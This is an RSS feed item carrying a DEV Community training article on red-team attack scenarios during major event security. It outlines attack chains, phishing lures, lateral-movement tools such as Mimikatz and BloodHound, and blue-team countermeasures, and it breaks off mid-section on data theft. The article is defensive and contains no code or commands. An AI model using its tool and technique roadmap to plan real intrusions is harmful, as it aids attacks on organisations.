<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Excalibra</title>
    <description>The latest articles on DEV Community by Excalibra (@excalibra).</description>
    <link>https://dev.to/excalibra</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2465115%2F44e01ea7-d2d5-4532-8d8a-4a94ebf19e42.jpg</url>
      <title>DEV Community: Excalibra</title>
      <link>https://dev.to/excalibra</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/excalibra"/>
    <language>en</language>
    <item>
      <title>Technical Training on Common Red Team Attack Scenarios During Major Event Security Assurance</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 23 Sep 2026 12:31:33 +0000</pubDate>
      <link>https://dev.to/excalibra/technical-training-on-common-red-team-attack-scenarios-during-major-event-security-assurance-268</link>
      <guid>https://dev.to/excalibra/technical-training-on-common-red-team-attack-scenarios-during-major-event-security-assurance-268</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Article Summary:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
This article systematically examines eight major categories of red team attack scenarios during major event security assurance. It covers boundary breaches, social engineering phishing, supply chain poisoning, 0day/Nday exploitation, internal network lateral movement, data theft, DDoS attacks, and critical infrastructure targeting. Each scenario is analysed in terms of its attack chain and blue team countermeasures. The article emphasises the establishment of an attacker-perspective defence mindset and provides practical protection guidance for security operations personnel.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Categories:&lt;/strong&gt; Penetration Testing, Red Team, Internal Network Penetration, Incident Response, Security Awareness&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Executive Summary
&lt;/h2&gt;

&lt;p&gt;During major event security assurance, adversaries employ red team thinking to launch high-intensity, highly covert attacks against networks, systems, and data. This constitutes a concentrated test of the overall security protection capabilities of responsible organisations. It covers eight categories: network boundary breaches, supply chain poisoning, social engineering phishing, 0day/Nday exploitation, internal network lateral movement, data theft, DDoS attacks, and targeted strikes on critical infrastructure. Each scenario is analysed in terms of tactical intent, attack chain, typical techniques, and blue team countermeasures. The core principles of red team attacks are also summarised to help security operations personnel develop an attacker-perspective defence mindset and make thorough preparations for major event security assurance.&lt;/p&gt;

&lt;h2&gt;
  
  
  Chapter 1: Overall Situation of Major Event Security Assurance and Red Team Attacks
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1.1 What is Major Event Security Assurance?
&lt;/h3&gt;

&lt;p&gt;Major event security assurance refers to the high-intensity, high-level cybersecurity protection work carried out during major events such as national holidays, major political conferences, international summits, and large-scale sporting events. During these periods, attackers—particularly state-level hacker organisations and professional attack teams—concentrate their efforts on key targets. Their intent is to steal sensitive data, paralyse critical businesses, and create severe security incidents, thereby disrupting the smooth conduct of major events.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.2 Definition and Role of the Red Team
&lt;/h3&gt;

&lt;p&gt;A red team is a professional security team that simulates the behaviour of real attackers for the purpose of conducting attack-defence exercises. Compared with traditional penetration testing, the characteristics of a red team are more prominently reflected in four aspects:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Objective-oriented:&lt;/strong&gt; The ultimate goal is to acquire core assets and achieve business impact, rather than merely discovering security vulnerabilities.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Full-chain attack:&lt;/strong&gt; The attack process covers the complete chain of reconnaissance, initial access, persistence, lateral movement, data theft, and impact generation.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stealth priority:&lt;/strong&gt; The team pursues long-term lurking, low-signature penetration, and avoidance of detection by defenders. The attack duration may last for weeks or even months.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Integration of social engineering:&lt;/strong&gt; In addition to technical means, extensive use is made of phishing, spear-phishing, physical intrusion, and other social engineering techniques.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  1.3 Characteristics of Red Team Attacks During Major Event Security Assurance
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Characteristic&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;High attack intensity&lt;/td&gt;
&lt;td&gt;Attackers may simultaneously use multi-dimensional attack methods and repeatedly attempt to breach the boundary.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Organised attacks&lt;/td&gt;
&lt;td&gt;State-level, organised attack teams with clear division of labour and mature tools.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Clear objectives&lt;/td&gt;
&lt;td&gt;Targeted attacks against core business systems, critical data, and key personnel.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Strong covertness&lt;/td&gt;
&lt;td&gt;Extensive use of encrypted traffic, Living off the Land techniques, in-memory webshells, and other covert means.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Long duration&lt;/td&gt;
&lt;td&gt;Attack preparation may begin months in advance and culminate during the major event.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Supply chain exploitation&lt;/td&gt;
&lt;td&gt;Indirect attacks on targets via software supply chains and third-party services.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  1.4 Typical Attack Chain of Red Team Attacks
&lt;/h3&gt;

&lt;p&gt;Red team attacks generally follow a clear attack chain model. Understanding the attack chain is the foundation for effective defence:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reconnaissance → Weaponisation → Delivery → Exploitation → Installation → Command and Control (C2) → Actions on Objectives&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Reconnaissance:&lt;/strong&gt; Collect information on the target's network structure, employee information, technology stack, and exposure surface.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Weaponisation:&lt;/strong&gt; Create phishing emails, malicious documents, and vulnerability exploitation tools.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Delivery:&lt;/strong&gt; Deliver the payload via email, web pages, USB drives, or the supply chain.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exploitation:&lt;/strong&gt; Trigger vulnerabilities to obtain execution privileges.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Installation:&lt;/strong&gt; Implant Trojans, webshells, and backdoors to establish persistent access.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Command and Control:&lt;/strong&gt; Establish C2 channels for command and data transmission.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Actions on Objectives:&lt;/strong&gt; Conduct lateral movement, privilege escalation, data theft, infrastructure destruction, and cover-up retreat operations.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The core task of the blue team during major event security assurance is to set up detection and blocking points at every stage of the attack chain, thereby neutralising the attack at the earliest possible stage.&lt;/p&gt;

&lt;h2&gt;
  
  
  Chapter 2: Panorama of Common Red Team Attack Scenarios During Major Event Security Assurance
&lt;/h2&gt;

&lt;p&gt;Based on years of practical attack-defence experience and major event security assurance duty, red team attack scenarios during these periods can be summarised into eight major categories, covering multiple dimensions such as network boundaries, personnel, applications, data, and infrastructure:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;No.&lt;/th&gt;
&lt;th&gt;Attack Scenario&lt;/th&gt;
&lt;th&gt;Attack Target&lt;/th&gt;
&lt;th&gt;Threat Level&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Boundary breach: exposure surface attacks and vulnerability exploitation&lt;/td&gt;
&lt;td&gt;Boundary devices, web applications, VPN, bastion hosts&lt;/td&gt;
&lt;td&gt;Extremely high&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Social engineering phishing: email, phishing, and delivery attacks&lt;/td&gt;
&lt;td&gt;Employee endpoints, account passwords, internal information&lt;/td&gt;
&lt;td&gt;Extremely high&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Supply chain poisoning and third-party risk exploitation&lt;/td&gt;
&lt;td&gt;Software supply chain, outsourced services, development environment&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;0day and Nday vulnerability exploitation&lt;/td&gt;
&lt;td&gt;Core systems, application frameworks, basic components&lt;/td&gt;
&lt;td&gt;Extremely high&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Internal network penetration and lateral movement&lt;/td&gt;
&lt;td&gt;Core servers, business systems, domain controllers&lt;/td&gt;
&lt;td&gt;Extremely high&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Data theft and data destruction&lt;/td&gt;
&lt;td&gt;Databases, file shares, backup systems&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;DDoS attacks and business paralysis&lt;/td&gt;
&lt;td&gt;Critical business systems, egress links&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Critical infrastructure and industrial control system attacks&lt;/td&gt;
&lt;td&gt;Data centres, power, industrial control devices, operations systems&lt;/td&gt;
&lt;td&gt;Extremely high&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The following sections analyse each of these scenarios in turn.&lt;/p&gt;

&lt;h2&gt;
  
  
  Chapter 3: In-Depth Analysis of Common Red Team Attack Scenarios
&lt;/h2&gt;

&lt;h3&gt;
  
  
  3.1 Scenario One: Internet Attack Surface Breach and Boundary Vulnerability Exploitation
&lt;/h3&gt;

&lt;h4&gt;
  
  
  3.1.1 Scenario Description
&lt;/h4&gt;

&lt;p&gt;On the eve of major event security assurance, the red team first conducts full-scale mapping of the target organisation's internet exposure surface. The mapping scope covers domain assets, IP ranges, open ports, web applications, VPN devices, email systems, and cloud services. After identifying an exploitable boundary breach point, the red team uses known vulnerabilities or logical flaws to breach the boundary and obtain an internal network springboard.&lt;/p&gt;

&lt;h4&gt;
  
  
  3.1.2 Attack Chain Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Reconnaissance phase:&lt;/strong&gt; Use subdomain enumeration, certificate transparency logs (such as crt.sh), and search engine fingerprinting to map the target's internet assets. Common tools include Subfinder, Amass, Fofa, Shodan, Quake, and Hunter.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Vulnerability discovery:&lt;/strong&gt; For assets such as web applications, OA systems, VPN devices, and email gateways, batch-detect known vulnerabilities (such as Struts2, Log4j2, Shiro, Fastjson, and Spring framework vulnerabilities). Simultaneously attempt to discover unauthorised access, default passwords, and logical bypass risks.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Boundary breach:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Obtain webshells (such as Behinder or Godzilla) through web application vulnerability exploitation.&lt;/li&gt;
&lt;li&gt;Exploit command injection or remote command execution vulnerabilities in boundary devices to gain device control.&lt;/li&gt;
&lt;li&gt;Conduct weak password or password brute-force attacks against VPN/bastion hosts to obtain VPN login privileges.&lt;/li&gt;
&lt;li&gt;Exploit cloud asset misconfigurations (such as object storage permissions, databases exposed to the public internet, or OSS bucket leaks) to breach the boundary.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Establishing a foothold:&lt;/strong&gt; Upload webshells, implant in-memory webshells (such as Lilac or Behinder memory shells), and establish tunnels (such as frp, nps, or ew).&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  3.1.3 Typical Techniques and Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Asset mapping:&lt;/strong&gt; FOFA, Quake, Shodan, Hunter, CT-UNSS, OneForAll&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Vulnerability detection:&lt;/strong&gt; xray, Nuclei, Goby, vulmap, CNVD&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Web exploitation:&lt;/strong&gt; SQLMap, BurpSuite, Yujian, Nuclei&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Privilege maintenance:&lt;/strong&gt; In-memory webshells, reverse shells, bind shells&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  3.1.4 Blue Team Countermeasures
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Before major event security assurance, conduct internet attack surface reduction: close unnecessary ports, decommission zombie assets, and reduce VPN/RDP exposure.&lt;/li&gt;
&lt;li&gt;Conduct vulnerability assessment and patch hardening for boundary devices, web applications, and VPNs.&lt;/li&gt;
&lt;li&gt;Deploy WAF, IPS, and IDS, configure blocking policies, and execute IP blocking against high-risk attack sources.&lt;/li&gt;
&lt;li&gt;Strengthen log monitoring and alarm linkage for web applications and boundary devices.&lt;/li&gt;
&lt;li&gt;Establish detection and removal mechanisms for discovered webshells and in-memory webshells.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3.2 Scenario Two: Phishing Emails and Social Engineering Attacks
&lt;/h3&gt;

&lt;h4&gt;
  
  
  3.2.1 Attack Description
&lt;/h4&gt;

&lt;p&gt;Phishing emails are the most frequently used and most successful attack method employed by red teams during major event security assurance. The red team uses content such as "major event security notices", "security exercises", "bonus payments", or "instructions from leadership" as bait. They deliver malicious attachments or phishing links to employees of the target organisation, tricking them into clicking links, entering account passwords, and thereby stealing login privileges for email, OA, VPN, and other systems.&lt;/p&gt;

&lt;h4&gt;
  
  
  3.2.2 Attack Chain Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Information gathering:&lt;/strong&gt; Collect employee names, positions, email addresses, and organisational structure information through social platforms, recruitment websites, and the target organisation's official website.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Weaponisation:&lt;/strong&gt; Create malicious documents disguised as "major event security notices" or "patch upgrades" (carrying macros, OLE objects, or downloaders), or create phishing pages that imitate OA or VPN login pages.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Delivery:&lt;/strong&gt; Send emails in bulk, disguising the sender (forging sender addresses and sender names) and using technical means to bypass email gateway protection.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Inducement:&lt;/strong&gt; Exploit managers' natural trust in major event security and security work. Create a sense of urgency or threat, or combine with benefit inducements to lower the target's vigilance.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Harvesting:&lt;/strong&gt; After the employee completes the click action, further trick them into entering account passwords, or clicking phishing links and enabling macros to run malicious code.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  3.2.3 Typical Phishing Types
&lt;/h4&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Type&lt;/th&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;th&gt;Effect&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Phishing email&lt;/td&gt;
&lt;td&gt;Forged sender, spoofed system, forged attachment&lt;/td&gt;
&lt;td&gt;Obtain account passwords, induce downloads&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Spear-phishing&lt;/td&gt;
&lt;td&gt;Targeted delivery to specific executives or key positions&lt;/td&gt;
&lt;td&gt;High success rate, difficult to detect&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Watering hole attack&lt;/td&gt;
&lt;td&gt;Pre-place malicious content on websites frequently visited by the target&lt;/td&gt;
&lt;td&gt;Infection upon target visit&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SMS phishing / voice phishing&lt;/td&gt;
&lt;td&gt;Spoofed system, spoofed customer service&lt;/td&gt;
&lt;td&gt;Induce entry of verification codes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;QR code phishing&lt;/td&gt;
&lt;td&gt;Forge QR codes to induce scanning and information entry&lt;/td&gt;
&lt;td&gt;Bypass endpoint detection&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h4&gt;
  
  
  3.2.4 Blue Team Countermeasures
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Strengthen email gateway security detection: intercept similar domains, forged senders, malicious attachments, and malicious links.&lt;/li&gt;
&lt;li&gt;Conduct phishing exercises and security awareness training for all employees to help them develop the habit of "not clicking unfamiliar links and not casually entering account information".&lt;/li&gt;
&lt;li&gt;Deploy multi-factor authentication (MFA) so that even if an account is compromised, the attacker cannot easily exploit it.&lt;/li&gt;
&lt;li&gt;Conduct risk monitoring of email accounts, focusing on abnormal login locations, abnormal download volumes, and abnormal forwarding behaviour.&lt;/li&gt;
&lt;li&gt;During major event security assurance, for sensitive content such as "major event security" and "patches", clarify official unified release channels to prevent content from being forged and exploited by attackers.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3.3 Scenario Three: Supply Chain Attacks and Third-Party Risks
&lt;/h3&gt;

&lt;h4&gt;
  
  
  3.3.1 Attack Description
&lt;/h4&gt;

&lt;p&gt;Supply chain attacks are an extremely destructive attack scenario during major event security assurance. Attackers indirectly intrude into the target network by compromising software vendors, outsourced service providers, third-party operations and maintenance vendors, development code repositories, and dependency packages. Because the various links in the supply chain generally enjoy high trust and have weak protection capabilities, such attacks can often bypass frontal defence lines and directly hit core targets.&lt;/p&gt;

&lt;h4&gt;
  
  
  3.3.2 Attack Chain Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Upstream attack:&lt;/strong&gt; Compromise the software vendor's update server or signature system, and implant malicious code into software update packages.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Development environment attack:&lt;/strong&gt; Compromise developer computers, CI/CD pipelines, and code repositories to implant backdoors into source code.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dependency library attack:&lt;/strong&gt; Poison open-source components and package repositories such as npm/pypi, waiting for the target to pull and install them.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Third-party service attack:&lt;/strong&gt; Compromise the endpoints or accounts of outsourcing companies, operations vendors, cleaning and security contractors, and other partners.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cloud service attack:&lt;/strong&gt; Use cloud accounts, API keys, and cloud misconfigurations to intrude into the target's cloud assets.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  3.3.3 Typical Cases and Techniques
&lt;/h4&gt;

&lt;p&gt;Attacks launched through supply chain upgrade packages and open-source package poisoning are highly prevalent during major event security assurance. Attackers impersonate outsourced operations personnel, contact target employees under the pretext of "inspection" or "maintenance", and implant disguised malicious tools. They also exploit weak passwords and unpatched vulnerabilities in third-party systems to intrude into the internal network, then gradually move laterally towards the core area. Alternatively, they exploit the lax permissions of development and testing environments to gradually expand their influence into the production environment.&lt;/p&gt;

&lt;h4&gt;
  
  
  3.3.4 Blue Team Countermeasures
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Establish a third-party supplier list. During major event security assurance, register, approve, and supervise supplier operations with two-person oversight.&lt;/li&gt;
&lt;li&gt;Configure least-privilege and time-limited privileges for outsourced personnel accounts, and implement behaviour auditing.&lt;/li&gt;
&lt;li&gt;Conduct integrity verification, signature verification, and permission control for code repositories and build pipelines.&lt;/li&gt;
&lt;li&gt;Establish a software bill of materials (SBOM) and conduct vulnerability management for dependency components.&lt;/li&gt;
&lt;li&gt;Implement strict isolation between development, testing, and production environments, and configure security baselines.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3.4 Scenario Four: 0day and Nday Vulnerability Exploitation
&lt;/h3&gt;

&lt;h4&gt;
  
  
  3.4.1 Attack Description
&lt;/h4&gt;

&lt;p&gt;0day vulnerabilities (undisclosed vulnerabilities) and Nday vulnerabilities (publicly disclosed but unpatched vulnerabilities) are highly effective weapons for red teams. During major event security assurance, red teams typically carry a large number of exploitation tools for known vulnerabilities (such as Exchange, VPN, Weblogic, Spring, and Log4j). They also use undisclosed 0day vulnerabilities to directly attack core systems.&lt;/p&gt;

&lt;h4&gt;
  
  
  3.4.2 Attack Chain Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Intelligence gathering:&lt;/strong&gt; Track open-source communities, security advisories, and dark web trading channels to obtain intelligence on known vulnerabilities (Nday) or undisclosed vulnerabilities (0day).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Targeted selection:&lt;/strong&gt; Select matching vulnerabilities based on the target's technology stack (such as the Spring framework, Log4j2 component, Fortinet VPN, or Exchange email system).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exploit construction:&lt;/strong&gt; Use public exploits, self-developed tools, or modified existing exploit code to build the attack payload.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exploit delivery:&lt;/strong&gt; Send crafted packets to the target system to trigger the vulnerability and obtain command execution privileges.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Defence evasion:&lt;/strong&gt; Bypass security detection through encrypted traffic, obfuscated encoding, and traffic shaping.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  3.4.3 Typical Vulnerability Types and Impact
&lt;/h4&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Vulnerability Type&lt;/th&gt;
&lt;th&gt;Typical Components&lt;/th&gt;
&lt;th&gt;Impact&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Remote code execution&lt;/td&gt;
&lt;td&gt;Log4j2, FastJSON, Spring framework&lt;/td&gt;
&lt;td&gt;Direct command execution, host control&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deserialisation&lt;/td&gt;
&lt;td&gt;Shiro, FastJSON, Java deserialisation&lt;/td&gt;
&lt;td&gt;Remote code execution, penetration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command injection&lt;/td&gt;
&lt;td&gt;Various web middleware, API interfaces&lt;/td&gt;
&lt;td&gt;Command execution, data leakage&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Privilege escalation&lt;/td&gt;
&lt;td&gt;Authentication and authorisation flaws&lt;/td&gt;
&lt;td&gt;Unauthorised access, data leakage&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;File upload&lt;/td&gt;
&lt;td&gt;Editors, file upload components&lt;/td&gt;
&lt;td&gt;Webshell implantation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h4&gt;
  
  
  3.4.4 Blue Team Countermeasures
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Establish a vulnerability intelligence acquisition and early warning mechanism, and conduct rapid assessment and remediation of Nday vulnerabilities.&lt;/li&gt;
&lt;li&gt;Conduct vulnerability monitoring for core components (using open-source scanners, commercial vulnerability scanning tools, or SCA tools).&lt;/li&gt;
&lt;li&gt;Host hardening: implement measures such as minimal installation, streamlined open services, timely patch installation, and disabling high-risk component features.&lt;/li&gt;
&lt;li&gt;Monitor web access records and system logs, and build attack signature detection rules.&lt;/li&gt;
&lt;li&gt;Formulate emergency response plans for 0day vulnerability risks. During major event security assurance, strictly implement the "isolate first, remediate later" disposal strategy.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3.5 Scenario Five: Internal Network Penetration and Lateral Movement
&lt;/h3&gt;

&lt;h4&gt;
  
  
  3.5.1 Attack Description
&lt;/h4&gt;

&lt;p&gt;After obtaining initial access privileges, the red team immediately conducts internal network reconnaissance and lateral movement. The goal is to ultimately obtain privileges for core business systems, domain controllers, or access to critical data. Lateral movement is the most threatening link in major event security assurance attacks and best reflects the attacker's technical level.&lt;/p&gt;

&lt;h4&gt;
  
  
  3.5.2 Attack Chain Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Internal network reconnaissance:&lt;/strong&gt; Use internal network scanning tools (such as Fscan, Nmap, or the internal network version of frp) to probe internal hosts, ports, services, and domain structures.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Privilege escalation:&lt;/strong&gt; Use local privilege escalation vulnerabilities (such as kernel vulnerabilities), service vulnerabilities, and misconfigurations to elevate privileges to System/Root.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Credential acquisition:&lt;/strong&gt; Capture passwords from memory (such as through Mimikatz), read configuration files, conduct LDAP queries, and export SAM/HASH values.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lateral movement:&lt;/strong&gt; Use authentication channels such as PsExec, WMI, scheduled tasks, SCM, and RDP to complete jumps within the internal network.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Domain attack:&lt;/strong&gt; Launch attacks against domain controllers (such as DCSync, DSReplication, MS17-010, or BloodHound) to obtain domain administrator privileges.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Persistence:&lt;/strong&gt; Implant hidden users, backdoors, scheduled tasks, and services within the domain to maintain long-term access privileges.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Actions on objectives:&lt;/strong&gt; Access core databases, file servers, and business systems to export target data.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  3.5.3 Typical Attack Techniques and Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Internal network scanning:&lt;/strong&gt; Fscan, Ladon, NetScan, internal asset detection&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Credential acquisition:&lt;/strong&gt; Mimikatz, Procdump, LSASecrets, WCE&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lateral movement:&lt;/strong&gt; PsExec, Impacket suite, SharpHound, BloodHound&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Domain attack:&lt;/strong&gt; MS17010, DCSync, Kerberos attacks (Golden/Silver Ticket), Group Policy&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tunnel forwarding:&lt;/strong&gt; frp, SSH tunnels, Neo-reGeorg, HTTP tunnels&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  3.5.4 Blue Team Countermeasures
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Segmentation and isolation:&lt;/strong&gt; According to classified protection requirements, divide the network into different security domains and implement vertical and horizontal isolation measures.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Host hardening:&lt;/strong&gt; Close unnecessary ports, disable weak passwords, and implement access whitelist management.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Account auditing:&lt;/strong&gt; Monitor abnormal logins, use of high-privilege accounts, and lateral connection behaviour.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Centralised logging:&lt;/strong&gt; Collect domain controller, server, and security device logs in a unified manner, and conduct timeline-based correlation analysis.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Threat monitoring:&lt;/strong&gt; Deploy monitoring and detection probes at key nodes such as domain controllers, databases, and operations channels. Use the ATT&amp;amp;CK framework to identify attack behaviour.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;MFA reinforcement:&lt;/strong&gt; Implement MFA and bastion host controls for domain administrators and operations accounts.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3.6 Scenario Six: Data Theft and Data Security Destruction
&lt;/h3&gt;

&lt;h4&gt;
  
  
  3.6.1 Attack Description
&lt;/h4&gt;

&lt;p&gt;During major event security assurance, the ultimate goal of the red team often focuses on core database data, personal privacy data, business secrets, and source code—these categories of high-value assets. Data theft attacks typically erupt after successful lateral movement and when privileges have reached a critical point. Attackers complete bulk data export in a silent and traceless manner.&lt;/p&gt;

&lt;h4&gt;
  
  
  3.6.2 Attack Chain Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Locating data:&lt;/strong&gt; Determine the storage locations of high-value data through databases, file server shares, network drives, and source code repositories.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bulk export:&lt;/strong&gt; Use database export tools (such as Navicat, SQL Server Agent, or mysql dump) to complete data export. Compress files and exfiltrate them.&lt;/li&gt;
&lt;li&gt;
